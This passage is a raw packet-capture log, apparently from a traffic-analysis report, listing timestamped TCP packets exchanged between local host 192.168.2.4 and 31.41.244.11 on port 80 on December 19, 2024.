                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.495727062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.495795012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.496732950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.496812105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.496836901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.496885061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.497819901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.497864962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.497922897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.498191118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.498914003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.498963118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.499042034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.499085903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.500088930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.500144958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.500158072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.500206947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.501172066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.501219034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.501257896 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.501347065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.502240896 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.502305984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.502355099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.502397060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.503364086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.503434896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.503473043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.503519058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.504457951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.504509926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.504575968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.504617929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.505606890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.505656958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.505702972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.505753994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.506748915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.506774902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.506819010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.507782936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.507838011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.507934093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.507985115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.508927107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.508972883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.508994102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.509040117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.510052919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.510165930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.510196924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.510214090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.511171103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.511223078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.511269093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.511327028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.512294054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.512343884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.512388945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.512489080 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.513410091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.513436079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.513458014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.513473034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.514489889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.514553070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.514566898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.514600992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.515551090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.515625000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.515638113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.515682936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.516697884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.516747952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.516877890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.516921997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.517824888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.517900944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.651891947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.651911974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.651947975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.651983023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.652364016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.652504921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.652529955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.652573109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.653450012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.653495073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.653578043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.653729916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.654603958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.654659033 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.654696941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.654736996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.655663967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.655708075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.655864000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.655905962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.656764030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.656805038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.656897068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.656966925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.657877922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.657922029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.658004999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.658054113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.658957958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.659008026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.659204006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.659245014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.660094976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.660135984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.660207033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.660248041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.661185026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.661375999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.661384106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.661415100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.662291050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.662341118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.662463903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.662508011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.663505077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.663547039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.663558006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.663599968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.664570093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.664628983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.664788008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.664833069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.665710926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.665726900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.665754080 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.665771961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.666800976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.666841984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.666917086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.666956902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.667877913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.667918921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.667974949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.668015957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.668962002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.669004917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.669080019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.669121027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.670130014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.670154095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.670172930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.670192003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.671214104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.671335936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.671380997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.672405005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.672420979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.672441006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.672463894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.673450947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.673496008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.673504114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.673566103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.674540997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.674621105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.674685001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.674742937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.675717115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.675734043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.675777912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.676728964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.676779985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.676831007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.676876068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.677932978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.677983999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.678370953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.678414106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.679038048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.679083109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.679125071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.679167986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.680030107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.680207014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.680246115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.681170940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.681215048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.681279898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.681329966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.682260036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.682324886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.682367086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.682414055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.683393955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.683438063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.683478117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.683517933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.684468031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.684514046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.684566021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.684773922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.685637951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.685683966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.685708046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.685744047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.686767101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.686804056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.686813116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.686877966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.687858105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.687903881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.687912941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.687954903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.688962936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.689007044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.689009905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.689043045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.690054893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.690102100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.690140963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.690243959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.691116095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.691159964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.691302061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.691438913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.692254066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.692306995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.692343950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.692383051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.693325996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.693372965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.693454981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.693542957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.694504976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.694549084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.694552898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.694600105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.695569038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.695625067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.695698023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.695831060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.696669102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.696721077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.696744919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.696780920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.697758913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.697804928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.697843075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.698574066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.698915005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.698961020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.699088097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.699131012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.700020075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.700073004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.700145960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.700346947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.701081991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.701126099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.701204062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.701245070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.702334881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.702383995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.702404976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.702420950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.703300953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.703341007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.703541994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.703583002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.704396963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.704441071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.704576969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.704619884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.705584049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.705637932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.705670118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.705710888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.706676006 CET804986031.41.244.11192.168.2.4
